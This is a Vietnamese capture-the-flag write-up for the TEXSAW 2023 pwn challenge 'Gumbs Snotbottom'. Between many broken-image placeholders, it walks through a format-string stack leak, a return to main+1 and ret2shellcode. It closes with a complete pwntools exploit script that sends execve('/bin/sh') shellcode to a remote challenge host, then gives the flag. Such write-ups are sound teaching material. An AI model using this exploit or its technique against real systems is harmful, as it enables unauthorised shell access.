(writeup) TEXSAW 2023

Gumbs Snotbottom (300 point)

check file + checksec

Image Not Showing Possible Reasons

The image file may be corrupted
The server hosting the image is unavailable
The image path is incorrect
The image format is not supported

Learn More →

check ida

Image Not Showing Possible Reasons

The image file may be corrupted
The server hosting the image is unavailable
The image path is incorrect
The image format is not supported

Learn More →

Image Not Showing Possible Reasons

The image file may be corrupted
The server hosting the image is unavailable
The image path is incorrect
The image format is not supported

Learn More →

Image Not Showing Possible Reasons

The image file may be corrupted
The server hosting the image is unavailable
The image path is incorrect
The image format is not supported

Learn More →

NX tắt, hướng đi: ret2shellcode
ta thấy đề sẽ input 64 byte và chỉ có 24 byte trong payload là sẽ được chuyển hoa –->thường
offset:

Image Not Showing Possible Reasons

The image file may be corrupted
The server hosting the image is unavailable
The image path is incorrect
The image format is not supported

Learn More →

72

ngay $rbp có luôn stack và trong hàm to_lower có printf() –-> fmtstr
thấy stack ngay %11
payload ta gửi 24 byte "A" và kế đó là %11$p, padding 72 byte r thực thi lại main
nhưng dữ liệu leak ra ở bên kia là %10 nên chỉnh lại xíu

Image Not Showing Possible Reasons

The image file may be corrupted
The server hosting the image is unavailable
The image path is incorrect
The image format is not supported

Learn More →

khi ta thực thi lại hàm main thành công nhưng khi bước vào input() lần 2 để chèn shellcode thì bị lỗi xmm0

Image Not Showing Possible Reasons

The image file may be corrupted
The server hosting the image is unavailable
The image path is incorrect
The image format is not supported

Learn More →

ý tưởng sẽ nhảy lại hàm main()+1 sau <push>

Image Not Showing Possible Reasons

The image file may be corrupted
The server hosting the image is unavailable
The image path is incorrect
The image format is not supported

Learn More →

thành công bước vào lần gửi payload thứ 2, ta sẽ sử dụng tới stack ta leak được để trỏ vào shellcode
thì payload ta phải tiếp tục chèn 24 byte "A" rồi tới shellcode, padding 72 byte rồi ret vào stack trỏ tới shellcode

vì gửi shellcode luôn thì bị vướng 24 byte bắt buộc phải chuyển từ hoa sang thường, sợ dính phải byte kì dị như '' trong shellcode

ta có thể tính offset của stack ta leak ra được đến stack trỏ đến shellcode của ta

Image Not Showing Possible Reasons

The image file may be corrupted
The server hosting the image is unavailable
The image path is incorrect
The image format is not supported

Learn More →

0x007ffdee6f8180 - 0x007ffdee6f8148
0x38

Image Not Showing Possible Reasons

The image file may be corrupted
The server hosting the image is unavailable
The image path is incorrect
The image format is not supported

Learn More →

remote thôi

Image Not Showing Possible Reasons

The image file may be corrupted
The server hosting the image is unavailable
The image path is incorrect
The image format is not supported

Learn More →

script:

#!/usr/bin/python3

from pwn import *

context.binary = exe = ELF('./cs101-hw1',checksec=False)

#p = process(exe.path)
p = remote('18.216.238.24',1001)

# gdb.attach(p, gdbscript='''
# 	b*input+27
# 	b*input+32
# 	b*to_lower+106
# 	c
# 	''')
# input()

shellcode = asm(
    '''
    mov rbx, 29400045130965551
    push rbx

    mov rdi, rsp
    xor rsi, rsi
    xor rdx, rdx
    mov rax, 0x3b
    syscall
    ''', arch='amd64')

payload = b'A'*24
payload += b'%10$p'
payload = payload.ljust(72,b'A')
payload += p64(exe.sym['main']+1)

p.sendlineafter(b'Text:\n',payload)

p.recvuntil(b'a'*24)
stack_leak = int(p.recv(14),16)
log.info("stack leak: " + hex(stack_leak))
ptr_shell = stack_leak - 0x38

payload = b'A'*24
payload += shellcode
payload = payload.ljust(72,b'A')
payload += p64(ptr_shell)

p.sendlineafter(b'Text:\n',payload)

p.interactive()

texsaw{64_b1t_5He11CoD3_84bY}